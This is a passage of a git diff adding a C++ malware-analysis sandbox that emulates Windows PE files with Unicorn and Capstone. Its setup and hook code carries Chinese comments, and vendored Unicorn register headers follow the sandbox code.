+ m_heapSize; + + // 根据PE文件类型设置PEB和TEB + if (this->m_peInfo->isX64) { + // 设置64位PEB + m_peb64.ImageBaseAddress = m_peInfo->RecImageBase; + m_pebEnd = m_pebBase + AlignSize(sizeof(X64PEB), PAGE_SIZE); + m_tebEnd = m_tebBase + AlignSize(sizeof(X64TEB), PAGE_SIZE); + + // 设置64位TEB + m_teb64.ClientId.UniqueProcess = GetCurrentProcessId(); + m_teb64.ClientId.UniqueThread = GetCurrentThreadId(); + m_teb64.ProcessEnvironmentBlock = reinterpret_cast(m_pebBase); + m_teb64.NtTib.StackBase = (DWORD64)m_stackBase; + m_teb64.NtTib.StackLimit = (DWORD64)m_stackSize; + + // 设置堆 + m_peb64.ProcessHeap = m_heapBase; + + // 设置GS基址结构 + m_gsBaseStruct.teb = m_tebBase; + m_gsBaseStruct.peb = m_pebBase; + uint64_t gsAllocSize = AlignSize(sizeof(struct_gs_base), PAGE_SIZE); + + // 映射PEB到虚拟内存 + uc_mem_map(m_ucEngine, m_pebBase, m_pebEnd - m_pebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_pebBase, &m_peb64, sizeof(X64PEB)); + + // 映射TEB到虚拟内存 + uc_mem_map(m_ucEngine, m_tebBase, m_tebEnd - m_tebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_tebBase, &m_teb64, sizeof(X64TEB)); + + // 
映射GS基址结构到虚拟内存 + uc_mem_map(m_ucEngine, m_gsBase, gsAllocSize, UC_PROT_READ); + uc_mem_write(m_ucEngine, m_gsBase, &m_gsBaseStruct, + sizeof(struct_gs_base)); + + // 设置GS基址MSR + uc_x86_msr msr; + msr.rid = static_cast(Msr::kIa32GsBase); + msr.value = m_gsBase; + uc_reg_write(m_ucEngine, UC_X86_REG_MSR, &msr); + } else { + // 设置32位PEB + m_peb32.ImageBaseAddress = static_cast(m_peInfo->RecImageBase); + m_pebEnd = m_pebBase + AlignSize(sizeof(X32PEB), PAGE_SIZE); + m_tebEnd = m_tebBase + AlignSize(sizeof(X32TEB), PAGE_SIZE); + + // 设置32位TEB + m_teb32.ClientId.UniqueProcess = GetCurrentProcessId(); + m_teb32.ClientId.UniqueThread = GetCurrentThreadId(); + m_teb32.ProcessEnvironmentBlock = static_cast(m_pebBase); + m_teb32.NtTib.StackBase = static_cast(m_stackBase); + m_teb32.NtTib.StackLimit = static_cast(m_stackSize); + + // 设置堆 + m_peb32.ProcessHeap = static_cast(m_heapBase); + + // 映射PEB到虚拟内存 + uc_mem_map(m_ucEngine, m_pebBase, m_pebEnd - m_pebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_pebBase, &m_peb32, sizeof(X32PEB)); + + // 映射TEB到虚拟内存 + uc_mem_map(m_ucEngine, m_tebBase, m_tebEnd - m_tebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_tebBase, &m_teb32, sizeof(X32TEB)); + + // 对于32位,我们需要设置FS段寄存器指向TEB + SegmentSelector fs = {0}; + fs.fields.index = 3; + uc_reg_write(m_ucEngine, UC_X86_REG_FS, &fs.all); + + // 设置FS基址MSR + uc_x86_msr msr; + msr.rid = static_cast(Msr::kIa32FsBase); + msr.value = m_tebBase; + uc_reg_write(m_ucEngine, UC_X86_REG_MSR, &msr); + } +} +auto Sandbox::InitEnv(std::shared_ptr peInfo) -> void { + m_peInfo = peInfo; + + if (cs_open(CS_ARCH_X86, peInfo->isX64 ? CS_MODE_64 : CS_MODE_32, + &m_csHandle) != CS_ERR_OK) { + throw std::runtime_error("Failed to initialize Capstone"); + } + if (uc_open(UC_ARCH_X86, peInfo->isX64 ? 
UC_MODE_64 : UC_MODE_32, + &m_ucEngine) != UC_ERR_OK) { + cs_close(&m_csHandle); // 清理已分配的capstone资源 + throw std::runtime_error("Failed to initialize Unicorn"); + } + ResoveImport(); + ResolveExport(); + uc_err ucErr = uc_mem_map(m_ucEngine, m_peInfo->RecImageBase, + m_peInfo->peSize, UC_PROT_ALL); + if (ucErr != UC_ERR_OK) { + throw std::runtime_error("Failed to map memory"); + } + uc_mem_write(m_ucEngine, m_peInfo->RecImageBase, m_peInfo->peBuffer, + m_peInfo->peSize); + printf("map file to vm file: %llx\n", m_peInfo->RecImageBase); + printf("map file to vm size: %llx\n", m_peInfo->peSize); + SetupVirtualMachine(); +} + +auto Sandbox::Run() -> void { + // 初始化堆栈 + uc_err err = uc_mem_map(m_ucEngine, m_stackBase, m_stackSize, + UC_PROT_READ | UC_PROT_WRITE); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to map stack memory"); + } + + // 初始化堆 + err = uc_mem_map(m_ucEngine, m_heapBase, m_heapSize, + UC_PROT_READ | UC_PROT_WRITE); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to map heap memory"); + } + + // 设置寄存器 + uint64_t rsp = m_stackEnd - 128; + err = uc_reg_write(m_ucEngine, + m_peInfo->isX64 ? 
UC_X86_REG_RSP : UC_X86_REG_ESP, &rsp); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to write stack pointer"); + } + + // 设置入口点 + uint64_t entryPoint = m_peInfo->RecImageBase + m_peInfo->entryPoint; + + // 添加钩子 + uc_hook hook_code, hook_mem, hook_mem_unmap, hook_mem_write, hook_syscall; + + // 代码执行钩子 + err = uc_hook_add(m_ucEngine, &hook_code, UC_HOOK_CODE, + reinterpret_cast(sandboxCallbacks::handleCodeRun), + this, 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add code hook"); + } + + // 内存读取钩子 + err = + uc_hook_add(m_ucEngine, &hook_mem, UC_HOOK_MEM_READ | UC_HOOK_MEM_FETCH, + reinterpret_cast(sandboxCallbacks::handleMemoryRead), + this, 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add memory read hook"); + } + + // 未映射内存访问钩子 + err = uc_hook_add( + m_ucEngine, &hook_mem_unmap, + UC_HOOK_MEM_FETCH_UNMAPPED | UC_HOOK_MEM_READ_UNMAPPED | + UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_FETCH_PROT, + reinterpret_cast(sandboxCallbacks::handleMemoryUnmapRead), this, + 1, 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add unmapped memory hook"); + } + + // 内存写入钩子 + err = uc_hook_add( + m_ucEngine, &hook_mem_write, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_WRITE_PROT, + reinterpret_cast(sandboxCallbacks::handleMemoryWrite), this, 1, + 0); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add memory write hook"); + } + + // 系统调用钩子 + err = uc_hook_add(m_ucEngine, &hook_syscall, UC_HOOK_INTR | UC_HOOK_INSN, + reinterpret_cast(sandboxCallbacks::handleSyscall), + this, 1, 0, UC_X86_INS_SYSCALL); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to add syscall hook"); + } + + // 设置EIP/RIP + err = uc_reg_write(m_ucEngine, + m_peInfo->isX64 ? 
UC_X86_REG_RIP : UC_X86_REG_EIP, + &entryPoint); + if (err != UC_ERR_OK) { + throw std::runtime_error("Failed to set entry point"); + } + + // 开始执行 + std::cout << "Starting execution at " << std::hex << entryPoint + << std::endl; + err = uc_emu_start(m_ucEngine, entryPoint, m_peInfo->imageEnd, 0, 0); + if (err != UC_ERR_OK) { + std::cerr << "Emulation error: " << uc_strerror(err) << std::endl; + + // 32位环境下的错误处理 + if (!m_peInfo->isX64) { + uint32_t eip; + uc_reg_read(m_ucEngine, UC_X86_REG_EIP, &eip); + std::cerr << "Error occurred at EIP: 0x" << std::hex << eip + << std::endl; + + // 尝试读取当前指令 + uint8_t instruction[16]; + if (uc_mem_read(m_ucEngine, eip, instruction, + sizeof(instruction)) == UC_ERR_OK) { + std::cerr << "Instruction bytes: "; + for (int i = 0; i < 16; i++) { + printf("%02X ", instruction[i]); + } + std::cerr << std::endl; + } + } + } +} diff --git a/ai_anti_malware/sandbox.h b/ai_anti_malware/sandbox.h new file mode 100644 index 0000000..823d3d0 --- /dev/null +++ b/ai_anti_malware/sandbox.h @@ -0,0 +1,94 @@ +#pragma once +#include "head.h" + +#define PAGE_SIZE 0x1000 +#define CF_MASK (1 << 0) +#define PF_MASK (1 << 2) +#define ZF_MASK (1 << 6) +#define SF_MASK (1 << 7) +#define OF_MASK (1 << 11) +#define ALL_MASK (OF_MASK | SF_MASK | ZF_MASK | PF_MASK | CF_MASK) +#define STACK_BASE_64 0x7ffffffde000 +#define STACK_BASE_32 0xfffdd000 +#define STACK_SIZE_64 0x40000 +#define STACK_SIZE_32 0x21000 +#define HEAP_ADDRESS_64 0x500000000 +#define HEAP_SIZE_64 0x5000000 +#define HEAP_ADDRESS_32 0x5000000 +#define HEAP_SIZE_32 0x5000000 + +#define PEB_BASE 0x80000 +#define TEB_BASE 0x90000 + +#define X86_GDT_ADDR 0x30000 +#define X86_GDT_LIMIT 0x1000 +#define X86_GDT_ENTRY_SIZE 0x8 + +#define API_FUNCTION_SIZE 8 +#define PAGE_ALIGN(Va) (ULONG_PTR)(Va) & ~(PAGE_SIZE - 1) +#define PAGE_ALIGN_64(Va) (Va) & ~(0x1000ull - 1) +#define PAGE_ALIGN_64k(Va) ((Va)) & ~(0x10000ull - 1) +#define AlignSize(Size, Align) (Size + Align - 1) / Align* Align + +enum class 
WinVer { + kWin7 = 0x0610, + kWin7SP1 = 0x0611, + kWin8 = 0x0620, + kWin81 = 0x0630, + kWin10 = 0x0A00, + kWin10RS1 = 0x0A01, // Anniversary update + kWin10RS2 = 0x0A02, // Creators update + kWin10RS3 = 0x0A03, // Fall creators update + kWin10RS4 = 0x0A04, // Spring creators update + kWin10RS5 = 0x0A05, // October 2018 update + kWin1019H1 = 0x0A06, // May 2019 update 19H1 + kWin1019H2 = 0x0A07, // November 2019 update 19H2 + kWin1020H1 = 0x0A08 // April 2020 update 20H1 +}; + +class Sandbox { + public: + Sandbox(); + ~Sandbox(); + + // Public methods + auto InitEnv(std::shared_ptr peInfo) -> void; + + auto Run() -> void; + + auto GetCapstoneHandle() const -> csh { return m_csHandle; } + auto GetUnicornHandle() const -> uc_engine* { return m_ucEngine; } + auto GetPeInfo() const -> std::shared_ptr { return m_peInfo; } + + private: + std::shared_ptr m_peInfo; + uint64_t m_gsBase; + uint64_t m_pebBase; + uint64_t m_pebEnd; + uint64_t m_tebBase; + uint64_t m_tebEnd; + PVOID m_stackBuffer; // 没有释放 + uint64_t m_stackBase; + uint64_t m_stackSize; + uint64_t m_stackEnd; + uint64_t m_heapBase; + uint64_t m_heapSize; + uint64_t m_heapEnd; + uint64_t m_fakeBase; + struct_gs_base m_gsBaseStruct; + X64TEB m_teb64; + X64PEB m_peb64; + X32TEB m_teb32; + X32PEB m_peb32; + csh m_csHandle; // Capstone handle + uc_engine* m_ucEngine; // Unicorn engine handle + std::vector> m_impFuncDict; + std::vector> m_exportFuncDict; + std::vector> m_moduleList; + auto ResoveImport() -> void; + auto SetupVirtualMachine() -> void; + auto ResolveExport() -> void; + auto PushModuleToVM(const char* dllName, uint64_t moduleBase, + uint32_t x32Base) -> void; + auto processImportModule(const moudle_import* importModule) -> void; +}; diff --git a/ai_anti_malware/sandbox_callbacks.cpp b/ai_anti_malware/sandbox_callbacks.cpp new file mode 100644 index 0000000..fe45d2b --- /dev/null +++ b/ai_anti_malware/sandbox_callbacks.cpp @@ -0,0 +1 @@ +#include "sandbox_callbacks.h" diff --git 
a/ai_anti_malware/sandbox_callbacks.h b/ai_anti_malware/sandbox_callbacks.h new file mode 100644 index 0000000..153ce60 --- /dev/null +++ b/ai_anti_malware/sandbox_callbacks.h @@ -0,0 +1,70 @@ +#pragma once +#include "sandbox.h" + +namespace sandboxCallbacks { +static void handleCodeRun(uc_engine* uc, uint64_t address, uint32_t size, + void* userData) { + auto* sandbox = static_cast(userData); + if (!sandbox) return; + + // 读取当前执行的代码 + uint8_t* codeBuffer = new uint8_t[size]; + if (uc_mem_read(uc, address, codeBuffer, size) != UC_ERR_OK) { + delete[] codeBuffer; + return; + } + + // 使用Capstone反汇编 + cs_insn* instruction; + size_t instructionCount = + cs_disasm(sandbox->GetCapstoneHandle(), codeBuffer, size, address, 0, + &instruction); + + if (instructionCount > 0) { + // 打印地址和反汇编结果 + printf("0x%016" PRIx64 " %-12s %s\n", instruction[0].address, + instruction[0].mnemonic, instruction[0].op_str); + cs_free(instruction, instructionCount); + } + + delete[] codeBuffer; +} + +static void handleMemoryRead(uc_engine* uc, uc_mem_type type, uint64_t address, + int size, int64_t value, void* userData) { + auto* sandbox = static_cast(userData); + if (!sandbox) return; + + uint64_t regRax, regRip; + uc_reg_read(uc, + sandbox->GetPeInfo()->isX64 ? UC_X86_REG_RAX : UC_X86_REG_EAX, + ®Rax); + uc_reg_read(uc, + sandbox->GetPeInfo()->isX64 ? 
UC_X86_REG_RIP : UC_X86_REG_EIP, + ®Rip); + + uint64_t readAddress; + auto readError = + uc_mem_read(sandbox->GetUnicornHandle(), address, &readAddress, size); + printf( + "[handleMemoryRead] Address: %p Size: %p Rax: %p Rip: %p Error: %d " + "ReadData: %p\n", + address, size, regRax, regRip, readError, readAddress); +} + +static void handleMemoryUnmapRead(uc_engine* uc, uc_mem_type type, + uint64_t address, int size, int64_t value, + void* userData) { + // 待实现 +} + +static void handleMemoryWrite(uc_engine* uc, uc_mem_type type, uint64_t address, + int size, int64_t value, void* userData) { + // 待实现 +} + +static void handleSyscall(uc_engine* uc, void* userData) { + // 待实现 +} + +} // namespace sandboxCallbacks diff --git a/ai_anti_malware/unicorn/include/unicorn/arm.h b/ai_anti_malware/unicorn/include/unicorn/arm.h new file mode 100644 index 0000000..a0fd83e --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/arm.h @@ -0,0 +1,157 @@ +/* Unicorn Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM_H +#define UNICORN_ARM_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM registers +typedef enum uc_arm_reg { + UC_ARM_REG_INVALID = 0, + UC_ARM_REG_APSR, + UC_ARM_REG_APSR_NZCV, + UC_ARM_REG_CPSR, + UC_ARM_REG_FPEXC, + UC_ARM_REG_FPINST, + UC_ARM_REG_FPSCR, + UC_ARM_REG_FPSCR_NZCV, + UC_ARM_REG_FPSID, + UC_ARM_REG_ITSTATE, + UC_ARM_REG_LR, + UC_ARM_REG_PC, + UC_ARM_REG_SP, + UC_ARM_REG_SPSR, + UC_ARM_REG_D0, + UC_ARM_REG_D1, + UC_ARM_REG_D2, + UC_ARM_REG_D3, + UC_ARM_REG_D4, + UC_ARM_REG_D5, + UC_ARM_REG_D6, + UC_ARM_REG_D7, + UC_ARM_REG_D8, + UC_ARM_REG_D9, + UC_ARM_REG_D10, + UC_ARM_REG_D11, + UC_ARM_REG_D12, + UC_ARM_REG_D13, + UC_ARM_REG_D14, + UC_ARM_REG_D15, + UC_ARM_REG_D16, + UC_ARM_REG_D17, + UC_ARM_REG_D18, + UC_ARM_REG_D19, + UC_ARM_REG_D20, + UC_ARM_REG_D21, + UC_ARM_REG_D22, + UC_ARM_REG_D23, + UC_ARM_REG_D24, + UC_ARM_REG_D25, + UC_ARM_REG_D26, + UC_ARM_REG_D27, + UC_ARM_REG_D28, + UC_ARM_REG_D29, + UC_ARM_REG_D30, + UC_ARM_REG_D31, + UC_ARM_REG_FPINST2, + UC_ARM_REG_MVFR0, + UC_ARM_REG_MVFR1, + UC_ARM_REG_MVFR2, + UC_ARM_REG_Q0, + UC_ARM_REG_Q1, + UC_ARM_REG_Q2, + UC_ARM_REG_Q3, + UC_ARM_REG_Q4, + UC_ARM_REG_Q5, + UC_ARM_REG_Q6, + UC_ARM_REG_Q7, + UC_ARM_REG_Q8, + UC_ARM_REG_Q9, + UC_ARM_REG_Q10, + UC_ARM_REG_Q11, + UC_ARM_REG_Q12, + UC_ARM_REG_Q13, + UC_ARM_REG_Q14, + UC_ARM_REG_Q15, + UC_ARM_REG_R0, + UC_ARM_REG_R1, + UC_ARM_REG_R2, + UC_ARM_REG_R3, + UC_ARM_REG_R4, + UC_ARM_REG_R5, + UC_ARM_REG_R6, + UC_ARM_REG_R7, + UC_ARM_REG_R8, + UC_ARM_REG_R9, + UC_ARM_REG_R10, + UC_ARM_REG_R11, + UC_ARM_REG_R12, + UC_ARM_REG_S0, + UC_ARM_REG_S1, + UC_ARM_REG_S2, + UC_ARM_REG_S3, + UC_ARM_REG_S4, + UC_ARM_REG_S5, + UC_ARM_REG_S6, + UC_ARM_REG_S7, + UC_ARM_REG_S8, + UC_ARM_REG_S9, + UC_ARM_REG_S10, + UC_ARM_REG_S11, + UC_ARM_REG_S12, + UC_ARM_REG_S13, + UC_ARM_REG_S14, + UC_ARM_REG_S15, + UC_ARM_REG_S16, + 
UC_ARM_REG_S17, + UC_ARM_REG_S18, + UC_ARM_REG_S19, + UC_ARM_REG_S20, + UC_ARM_REG_S21, + UC_ARM_REG_S22, + UC_ARM_REG_S23, + UC_ARM_REG_S24, + UC_ARM_REG_S25, + UC_ARM_REG_S26, + UC_ARM_REG_S27, + UC_ARM_REG_S28, + UC_ARM_REG_S29, + UC_ARM_REG_S30, + UC_ARM_REG_S31, + + UC_ARM_REG_C1_C0_2, + UC_ARM_REG_C13_C0_2, + UC_ARM_REG_C13_C0_3, + + UC_ARM_REG_IPSR, + UC_ARM_REG_MSP, + UC_ARM_REG_PSP, + UC_ARM_REG_CONTROL, + UC_ARM_REG_ENDING, // <-- mark the end of the list or registers + + //> alias registers + UC_ARM_REG_R13 = UC_ARM_REG_SP, + UC_ARM_REG_R14 = UC_ARM_REG_LR, + UC_ARM_REG_R15 = UC_ARM_REG_PC, + + UC_ARM_REG_SB = UC_ARM_REG_R9, + UC_ARM_REG_SL = UC_ARM_REG_R10, + UC_ARM_REG_FP = UC_ARM_REG_R11, + UC_ARM_REG_IP = UC_ARM_REG_R12, +} uc_arm_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/arm64.h b/ai_anti_malware/unicorn/include/unicorn/arm64.h new file mode 100644 index 0000000..0f66518 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/arm64.h @@ -0,0 +1,344 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM64_H +#define UNICORN_ARM64_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM64 registers +typedef enum uc_arm64_reg { + UC_ARM64_REG_INVALID = 0, + + UC_ARM64_REG_X29, + UC_ARM64_REG_X30, + UC_ARM64_REG_NZCV, + UC_ARM64_REG_SP, + UC_ARM64_REG_WSP, + UC_ARM64_REG_WZR, + UC_ARM64_REG_XZR, + UC_ARM64_REG_B0, + UC_ARM64_REG_B1, + UC_ARM64_REG_B2, + UC_ARM64_REG_B3, + UC_ARM64_REG_B4, + UC_ARM64_REG_B5, + UC_ARM64_REG_B6, + UC_ARM64_REG_B7, + UC_ARM64_REG_B8, + UC_ARM64_REG_B9, + UC_ARM64_REG_B10, + UC_ARM64_REG_B11, + UC_ARM64_REG_B12, + UC_ARM64_REG_B13, + UC_ARM64_REG_B14, + UC_ARM64_REG_B15, + UC_ARM64_REG_B16, + UC_ARM64_REG_B17, + UC_ARM64_REG_B18, + UC_ARM64_REG_B19, + UC_ARM64_REG_B20, + UC_ARM64_REG_B21, + UC_ARM64_REG_B22, + UC_ARM64_REG_B23, + UC_ARM64_REG_B24, + UC_ARM64_REG_B25, + UC_ARM64_REG_B26, + UC_ARM64_REG_B27, + UC_ARM64_REG_B28, + UC_ARM64_REG_B29, + UC_ARM64_REG_B30, + UC_ARM64_REG_B31, + UC_ARM64_REG_D0, + UC_ARM64_REG_D1, + UC_ARM64_REG_D2, + UC_ARM64_REG_D3, + UC_ARM64_REG_D4, + UC_ARM64_REG_D5, + UC_ARM64_REG_D6, + UC_ARM64_REG_D7, + UC_ARM64_REG_D8, + UC_ARM64_REG_D9, + UC_ARM64_REG_D10, + UC_ARM64_REG_D11, + UC_ARM64_REG_D12, + UC_ARM64_REG_D13, + UC_ARM64_REG_D14, + UC_ARM64_REG_D15, + UC_ARM64_REG_D16, + UC_ARM64_REG_D17, + UC_ARM64_REG_D18, + UC_ARM64_REG_D19, + UC_ARM64_REG_D20, + UC_ARM64_REG_D21, + UC_ARM64_REG_D22, + UC_ARM64_REG_D23, + UC_ARM64_REG_D24, + UC_ARM64_REG_D25, + UC_ARM64_REG_D26, + UC_ARM64_REG_D27, + UC_ARM64_REG_D28, + UC_ARM64_REG_D29, + UC_ARM64_REG_D30, + UC_ARM64_REG_D31, + UC_ARM64_REG_H0, + UC_ARM64_REG_H1, + UC_ARM64_REG_H2, + UC_ARM64_REG_H3, + UC_ARM64_REG_H4, + UC_ARM64_REG_H5, + UC_ARM64_REG_H6, + UC_ARM64_REG_H7, + UC_ARM64_REG_H8, + UC_ARM64_REG_H9, + UC_ARM64_REG_H10, + UC_ARM64_REG_H11, + UC_ARM64_REG_H12, + UC_ARM64_REG_H13, + UC_ARM64_REG_H14, + 
UC_ARM64_REG_H15, + UC_ARM64_REG_H16, + UC_ARM64_REG_H17, + UC_ARM64_REG_H18, + UC_ARM64_REG_H19, + UC_ARM64_REG_H20, + UC_ARM64_REG_H21, + UC_ARM64_REG_H22, + UC_ARM64_REG_H23, + UC_ARM64_REG_H24, + UC_ARM64_REG_H25, + UC_ARM64_REG_H26, + UC_ARM64_REG_H27, + UC_ARM64_REG_H28, + UC_ARM64_REG_H29, + UC_ARM64_REG_H30, + UC_ARM64_REG_H31, + UC_ARM64_REG_Q0, + UC_ARM64_REG_Q1, + UC_ARM64_REG_Q2, + UC_ARM64_REG_Q3, + UC_ARM64_REG_Q4, + UC_ARM64_REG_Q5, + UC_ARM64_REG_Q6, + UC_ARM64_REG_Q7, + UC_ARM64_REG_Q8, + UC_ARM64_REG_Q9, + UC_ARM64_REG_Q10, + UC_ARM64_REG_Q11, + UC_ARM64_REG_Q12, + UC_ARM64_REG_Q13, + UC_ARM64_REG_Q14, + UC_ARM64_REG_Q15, + UC_ARM64_REG_Q16, + UC_ARM64_REG_Q17, + UC_ARM64_REG_Q18, + UC_ARM64_REG_Q19, + UC_ARM64_REG_Q20, + UC_ARM64_REG_Q21, + UC_ARM64_REG_Q22, + UC_ARM64_REG_Q23, + UC_ARM64_REG_Q24, + UC_ARM64_REG_Q25, + UC_ARM64_REG_Q26, + UC_ARM64_REG_Q27, + UC_ARM64_REG_Q28, + UC_ARM64_REG_Q29, + UC_ARM64_REG_Q30, + UC_ARM64_REG_Q31, + UC_ARM64_REG_S0, + UC_ARM64_REG_S1, + UC_ARM64_REG_S2, + UC_ARM64_REG_S3, + UC_ARM64_REG_S4, + UC_ARM64_REG_S5, + UC_ARM64_REG_S6, + UC_ARM64_REG_S7, + UC_ARM64_REG_S8, + UC_ARM64_REG_S9, + UC_ARM64_REG_S10, + UC_ARM64_REG_S11, + UC_ARM64_REG_S12, + UC_ARM64_REG_S13, + UC_ARM64_REG_S14, + UC_ARM64_REG_S15, + UC_ARM64_REG_S16, + UC_ARM64_REG_S17, + UC_ARM64_REG_S18, + UC_ARM64_REG_S19, + UC_ARM64_REG_S20, + UC_ARM64_REG_S21, + UC_ARM64_REG_S22, + UC_ARM64_REG_S23, + UC_ARM64_REG_S24, + UC_ARM64_REG_S25, + UC_ARM64_REG_S26, + UC_ARM64_REG_S27, + UC_ARM64_REG_S28, + UC_ARM64_REG_S29, + UC_ARM64_REG_S30, + UC_ARM64_REG_S31, + UC_ARM64_REG_W0, + UC_ARM64_REG_W1, + UC_ARM64_REG_W2, + UC_ARM64_REG_W3, + UC_ARM64_REG_W4, + UC_ARM64_REG_W5, + UC_ARM64_REG_W6, + UC_ARM64_REG_W7, + UC_ARM64_REG_W8, + UC_ARM64_REG_W9, + UC_ARM64_REG_W10, + UC_ARM64_REG_W11, + UC_ARM64_REG_W12, + UC_ARM64_REG_W13, + UC_ARM64_REG_W14, + UC_ARM64_REG_W15, + UC_ARM64_REG_W16, + UC_ARM64_REG_W17, + UC_ARM64_REG_W18, + UC_ARM64_REG_W19, + 
UC_ARM64_REG_W20, + UC_ARM64_REG_W21, + UC_ARM64_REG_W22, + UC_ARM64_REG_W23, + UC_ARM64_REG_W24, + UC_ARM64_REG_W25, + UC_ARM64_REG_W26, + UC_ARM64_REG_W27, + UC_ARM64_REG_W28, + UC_ARM64_REG_W29, + UC_ARM64_REG_W30, + UC_ARM64_REG_X0, + UC_ARM64_REG_X1, + UC_ARM64_REG_X2, + UC_ARM64_REG_X3, + UC_ARM64_REG_X4, + UC_ARM64_REG_X5, + UC_ARM64_REG_X6, + UC_ARM64_REG_X7, + UC_ARM64_REG_X8, + UC_ARM64_REG_X9, + UC_ARM64_REG_X10, + UC_ARM64_REG_X11, + UC_ARM64_REG_X12, + UC_ARM64_REG_X13, + UC_ARM64_REG_X14, + UC_ARM64_REG_X15, + UC_ARM64_REG_X16, + UC_ARM64_REG_X17, + UC_ARM64_REG_X18, + UC_ARM64_REG_X19, + UC_ARM64_REG_X20, + UC_ARM64_REG_X21, + UC_ARM64_REG_X22, + UC_ARM64_REG_X23, + UC_ARM64_REG_X24, + UC_ARM64_REG_X25, + UC_ARM64_REG_X26, + UC_ARM64_REG_X27, + UC_ARM64_REG_X28, + + UC_ARM64_REG_V0, + UC_ARM64_REG_V1, + UC_ARM64_REG_V2, + UC_ARM64_REG_V3, + UC_ARM64_REG_V4, + UC_ARM64_REG_V5, + UC_ARM64_REG_V6, + UC_ARM64_REG_V7, + UC_ARM64_REG_V8, + UC_ARM64_REG_V9, + UC_ARM64_REG_V10, + UC_ARM64_REG_V11, + UC_ARM64_REG_V12, + UC_ARM64_REG_V13, + UC_ARM64_REG_V14, + UC_ARM64_REG_V15, + UC_ARM64_REG_V16, + UC_ARM64_REG_V17, + UC_ARM64_REG_V18, + UC_ARM64_REG_V19, + UC_ARM64_REG_V20, + UC_ARM64_REG_V21, + UC_ARM64_REG_V22, + UC_ARM64_REG_V23, + UC_ARM64_REG_V24, + UC_ARM64_REG_V25, + UC_ARM64_REG_V26, + UC_ARM64_REG_V27, + UC_ARM64_REG_V28, + UC_ARM64_REG_V29, + UC_ARM64_REG_V30, + UC_ARM64_REG_V31, + + //> pseudo registers + UC_ARM64_REG_PC, // program counter register + + UC_ARM64_REG_CPACR_EL1, + + //> thread registers + UC_ARM64_REG_TPIDR_EL0, + UC_ARM64_REG_TPIDRRO_EL0, + UC_ARM64_REG_TPIDR_EL1, + + UC_ARM64_REG_PSTATE, + + //> exception link registers + UC_ARM64_REG_ELR_EL0, + UC_ARM64_REG_ELR_EL1, + UC_ARM64_REG_ELR_EL2, + UC_ARM64_REG_ELR_EL3, + + //> stack pointers registers + UC_ARM64_REG_SP_EL0, + UC_ARM64_REG_SP_EL1, + UC_ARM64_REG_SP_EL2, + UC_ARM64_REG_SP_EL3, + + //> other CP15 registers + UC_ARM64_REG_TTBR0_EL1, + UC_ARM64_REG_TTBR1_EL1, + + 
UC_ARM64_REG_ESR_EL0, + UC_ARM64_REG_ESR_EL1, + UC_ARM64_REG_ESR_EL2, + UC_ARM64_REG_ESR_EL3, + + UC_ARM64_REG_FAR_EL0, + UC_ARM64_REG_FAR_EL1, + UC_ARM64_REG_FAR_EL2, + UC_ARM64_REG_FAR_EL3, + + UC_ARM64_REG_PAR_EL1, + + UC_ARM64_REG_MAIR_EL1, + + UC_ARM64_REG_VBAR_EL0, + UC_ARM64_REG_VBAR_EL1, + UC_ARM64_REG_VBAR_EL2, + UC_ARM64_REG_VBAR_EL3, + + UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers + + //> alias registers + + UC_ARM64_REG_IP0 = UC_ARM64_REG_X16, + UC_ARM64_REG_IP1 = UC_ARM64_REG_X17, + UC_ARM64_REG_FP = UC_ARM64_REG_X29, + UC_ARM64_REG_LR = UC_ARM64_REG_X30, +} uc_arm64_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/m68k.h b/ai_anti_malware/unicorn/include/unicorn/m68k.h new file mode 100644 index 0000000..80e8b92 --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/m68k.h @@ -0,0 +1,50 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2014-2017 */ +/* This file is released under LGPL2. 
